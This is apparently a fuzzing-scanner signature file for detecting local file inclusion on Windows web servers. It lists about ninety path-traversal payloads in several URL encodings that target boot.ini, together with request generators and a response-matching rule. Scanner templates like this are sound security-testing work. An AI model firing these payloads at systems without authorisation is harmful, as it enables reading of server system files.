# info to search signature
id: lfi-05
type: fuzz
info:
  name: LFI on Windows
  risk: High

payloads:
    - '../boot.ini'
    - '../../boot.ini'
    - '../../../boot.ini'
    - '../../../../boot.ini'
    - '../../../../../boot.ini'
    - '../../../../../../boot.ini'
    - '../../../../../../../boot.ini'
    - '../../../../../../../../boot.ini'
    - '..%2fboot.ini'
    - '..%2f..%2fboot.ini'
    - '..%2f..%2f..%2fboot.ini'
    - '..%2f..%2f..%2f..%2fboot.ini'
    - '..%2f..%2f..%2f..%2f..%2fboot.ini'
    - '..%2f..%2f..%2f..%2f..%2f..%2fboot.ini'
    - '..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini'
    - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini'
    - '%2e%2e/boot.ini'
    - '%2e%2e/%2e%2e/boot.ini'
    - '%2e%2e/%2e%2e/%2e%2e/boot.ini'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini'
    - '%2e%2e%2fboot.ini'
    - '%2e%2e%2f%2e%2e%2fboot.ini'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
    - '..%252fboot.ini'
    - '..%252f..%252fboot.ini'
    - '..%252f..%252f..%252fboot.ini'
    - '..%252f..%252f..%252f..%252fboot.ini'
    - '..%252f..%252f..%252f..%252f..%252fboot.ini'
    - '..%252f..%252f..%252f..%252f..%252f..%252fboot.ini'
    - '..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini'
    - '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini'
    - '%252e%252e/boot.ini'
    - '%252e%252e/%252e%252e/boot.ini'
    - '%252e%252e/%252e%252e/%252e%252e/boot.ini'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini'
    - '%252e%252e%252fboot.ini'
    - '%252e%252e%252f%252e%252e%252fboot.ini'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
    - '..\boot.ini'
    - '..\..\boot.ini'
    - '..\..\..\boot.ini'
    - '..\..\..\..\boot.ini'
    - '..\..\..\..\..\boot.ini'
    - '..\..\..\..\..\..\boot.ini'
    - '..\..\..\..\..\..\..\boot.ini'
    - '..\..\..\..\..\..\..\..\boot.ini'
    - '..%255cboot.ini'
    - '..%255c..%255cboot.ini'
    - '..%255c..%255c..%255cboot.ini'
    - '..%255c..%255c..%255c..%255cboot.ini'
    - '..%255c..%255c..%255c..%255c..%255cboot.ini'
    - '..%255c..%255c..%255c..%255c..%255c..%255cboot.ini'
    - '..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini'
    - '..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini'
    - '%252e%252e\boot.ini'
    - '%252e%252e\%252e%252e\boot.ini..%5cboot.ini'
    - '..%5c..%5cboot.ini'
    - '..%5c..%5c..%5cboot.ini'
    - '..%5c..%5c..%5c..%5cboot.ini'
    - '..%5c..%5c..%5c..%5c..%5cboot.ini'
    - '..%5c..%5c..%5c..%5c..%5c..%5cboot.ini'
    - '..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini'
    - '..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini'
    - '%2e%2e\boot.ini'
    - '%2e%2e\%2e%2e\boot.ini'
    - '%2e%2e\%2e%2e\%2e%2e\boot.ini'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini'

requests:
  - generators:
      - Path("{{.payload}}", "*")
      - Query("{{.payload}}")
    detections:
      - >-
        StatusCode() == 200 && RegexSearch("response", "for 16-bit app support|boot loader")
